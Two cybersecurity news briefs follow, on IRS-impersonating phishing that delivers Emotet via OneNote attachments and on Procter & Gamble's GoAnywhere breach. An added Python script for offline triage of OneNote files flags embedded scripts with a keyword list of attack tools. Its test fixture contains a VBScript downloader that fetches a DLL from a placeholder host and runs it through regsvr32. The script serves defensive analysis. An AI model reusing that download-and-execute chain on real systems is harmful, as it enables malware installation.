
IRS Tax Forms Pose Malware Threat, Experts Warn
- Written by Ari Denial, Cybersecurity & Tech Writer
According to cybersecurity experts at Palo Alto Networks and Malwarebytes, attackers frequently impersonate the IRS, and the researchers have recently uncovered two distinct phishing campaigns that use different delivery methods.
One campaign, discovered by cybersecurity researchers, has attackers emailing fake W-9 tax forms while impersonating the IRS. The attached "form" is in fact a carrier for the Emotet malware, which can steal sensitive information from infected endpoints and spread itself to other machines. Emotet also serves as a dropper, allowing the attackers to deliver other malware, including ransomware.
After Microsoft began blocking macros by default in Office documents downloaded from the internet, Emotet changed tactics and now uses Microsoft OneNote files with embedded scripts to install the malware.
When the user launches the embedded VBScript file, Microsoft OneNote warns that the file may be harmful. Past campaigns have shown, however, that many users dismiss such warnings and run the file anyway. Once executed, the VBScript downloads the Emotet DLL and runs it with regsvr32.exe.
If you receive an email requesting a W-9 or other tax form, scan the attachment first with your local antivirus software. Because these forms contain sensitive information, do not upload them to cloud-based scanning services such as VirusTotal, where submitted files are shared with other subscribers.
Tax forms are normally distributed as PDF documents rather than Word attachments. If you receive a tax form as a Word attachment, do not open it, and never enable macros for it.
Tax forms are almost never distributed as OneNote documents, so if you receive one, do not open it; delete the email.
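As an added example (not from the original article, nor code from Palo Alto Networks, Malwarebytes or Microsoft), the following Python script shows how to triage a suspicious OneNote attachment offline, which is what the advice against uploading tax forms to cloud scanners implies in practice. It carves out the FileDataStoreObject records that OneNote uses to store embedded files (the header, footer and file-type GUIDs come from Microsoft's MS-ONESTORE specification), extracts each payload and sniffs its content for script or executable markers, because the object itself carries no filename and the icon shown in OneNote cannot be trusted. The sample .one bytes and the VBScript inside them are constructed here to mirror the chain described above (fetch a DLL, run it through regsvr32.exe); they are not a real Emotet sample, and the URL is a reserved .invalid name. The handling of padding before the footer GUID is an assumption: the parser tolerates up to 8 bytes rather than relying on an exact layout.

```python
import struct
import uuid

# GUIDs from Microsoft's MS-ONESTORE specification. .bytes_le gives the on-disk
# byte order (little-endian first three fields) that OneNote writes.
ONE_MAGIC = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le    # .one file header
FDSO_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le  # FileDataStoreObject start
FDSO_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le  # FileDataStoreObject end

# Fields that follow the header GUID: cbLength (uint64), unused (uint32), reserved (uint64)
FDSO_META = struct.Struct("<QIQ")


def extract_embedded_files(data: bytes):
    """Yield (offset, payload, footer_ok) for every FileDataStoreObject in a .one blob.

    The parser does not walk the file's object tree; it carves on the header GUID,
    which is what survives a damaged or deliberately malformed file.
    """
    pos = 0
    while True:
        start = data.find(FDSO_HEADER, pos)
        if start == -1:
            return
        meta_off = start + len(FDSO_HEADER)
        if meta_off + FDSO_META.size > len(data):
            return
        cb_length, _unused, _reserved = FDSO_META.unpack_from(data, meta_off)
        file_off = meta_off + FDSO_META.size
        payload = data[file_off:file_off + cb_length]   # truncated if cbLength lies
        end = file_off + len(payload)
        # Assumption: FileData may be padded to an 8-byte boundary before the footer,
        # so accept the footer GUID anywhere in the next 8 bytes instead of a fixed offset.
        footer_off = data.find(FDSO_FOOTER, end, end + 8 + len(FDSO_FOOTER))
        footer_ok = footer_off != -1
        yield start, payload, footer_ok
        pos = footer_off + len(FDSO_FOOTER) if footer_ok else start + 1


def classify(payload: bytes) -> str:
    """Cheap content sniffing: the object stores no filename, so judge the bytes."""
    if payload.startswith(b"MZ"):
        return "pe"
    if payload.startswith(b"%PDF"):
        return "pdf"
    if payload.startswith(b"\x89PNG") or payload.startswith(b"\xff\xd8\xff"):
        return "image"
    text = payload[:4096].decode("latin-1").lower()
    script_markers = ("createobject(", "wscript", "regsvr32", "powershell",
                      "cmd.exe", "mshta", "<script")
    if any(marker in text for marker in script_markers):
        return "script"
    return "unknown"


def triage(data: bytes):
    """Return [(offset, size, kind, footer_ok), ...] for the embedded files in data."""
    return [(off, len(p), classify(p), ok) for off, p, ok in extract_embedded_files(data)]


def is_suspicious(findings) -> bool:
    """A script or PE inside a 'tax form' page means delete it, not open it."""
    return any(kind in ("script", "pe") for _, _, kind, _ in findings)


def looks_like_one(data: bytes) -> bool:
    return data.startswith(ONE_MAGIC)


def build_fdso(payload: bytes) -> bytes:
    """Constructed test fixture: wrap payload as one FileDataStoreObject (8-byte padded)."""
    padding = b"\x00" * (-len(payload) % 8)
    return FDSO_HEADER + FDSO_META.pack(len(payload), 0, 0) + payload + padding + FDSO_FOOTER


# Constructed sample, not real malware: an inert VBScript that mirrors the loader
# chain in the article (fetch a DLL, run it via regsvr32.exe) plus a PNG stub.
VBS_LURE = (
    b'Set http = CreateObject("MSXML2.XMLHTTP")\r\n'
    b'http.Open "GET", "http://example.invalid/W-9.dll", False\r\n'
    b'http.Send\r\n'
    b'Set sh = CreateObject("WScript.Shell")\r\n'
    b'sh.Run "regsvr32.exe /s C:\\Users\\Public\\W-9.dll", 0\r\n'
)
PNG_STUB = b"\x89PNG\r\n\x1a\n" + b"\x00" * 13
SAMPLE_ONE = (
    ONE_MAGIC + b"\x00" * 48          # stand-in for the rest of the file header
    + build_fdso(PNG_STUB)
    + b"\x00" * 16                    # unrelated bytes between objects
    + build_fdso(VBS_LURE)
    + b"\x00" * 8
)

if __name__ == "__main__":
    print("looks like .one:", looks_like_one(SAMPLE_ONE))
    for off, size, kind, ok in triage(SAMPLE_ONE):
        print(f"embedded file at 0x{off:x}: {size} bytes, kind={kind}, footer_ok={ok}")
    print("suspicious:", is_suspicious(triage(SAMPLE_ONE)))
```

Run it against a real attachment by replacing SAMPLE_ONE with the file's bytes; a "script" or "pe" finding in a supposed tax form is reason enough to delete the email without ever opening it in OneNote. The content sniffing is deliberately simple and easy to evade, so treat "unknown" as unverified rather than clean.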
Procter & Gamble Admits GoAnywhere Bug Breach in Latest Cybersecurity Incident
- Written by Ari Denial, Cybersecurity & Tech Writer
Procter & Gamble (P&G) has confirmed a breach stemming from the vulnerability in Fortra's GoAnywhere managed file transfer (MFT) software. The company said it was "one of the many companies" affected and that the attackers obtained "some information" about its employees; P&G has not yet disclosed the nature or extent of that information.
P&G added that, although some employee data was stolen, the attackers were unable to access employees' financial or Social Security information.
Clop, a ransomware group reportedly linked to Russia, has claimed responsibility for breaching dozens of organizations through a zero-day vulnerability in Fortra's GoAnywhere MFT software. On its dark web leak site the group has named several high-profile victims, including Shell, Hitachi, Hatch Bank, Stanford University, Rubrik, Virgin, and many others.
According to reports, the vulnerability gave the Clop group unauthorized access to sensitive data held on the affected GoAnywhere instances. The group then reportedly demanded ransom payments from the affected organizations in return for not publishing the stolen data.
The full scale of the attack is still unclear, and the number of affected organizations is unknown. That several high-profile companies and institutions have already been named, however, is causing concern among cybersecurity experts.
The affected organizations have yet to disclose the impact of the breach on their operations and customers. The incident is nonetheless a reminder of the persistent threat posed by ransomware groups and of the need for organizations to remain vigilant and proactive in their security measures.
According to P&G, the company became aware of the incident in early February and promptly opened an investigation. As a precaution, P&G disabled its use of Fortra's services and notified employees of the attack.
P&G says there is currently no evidence that customer data was affected and has assured stakeholders that its business operations are continuing as normal.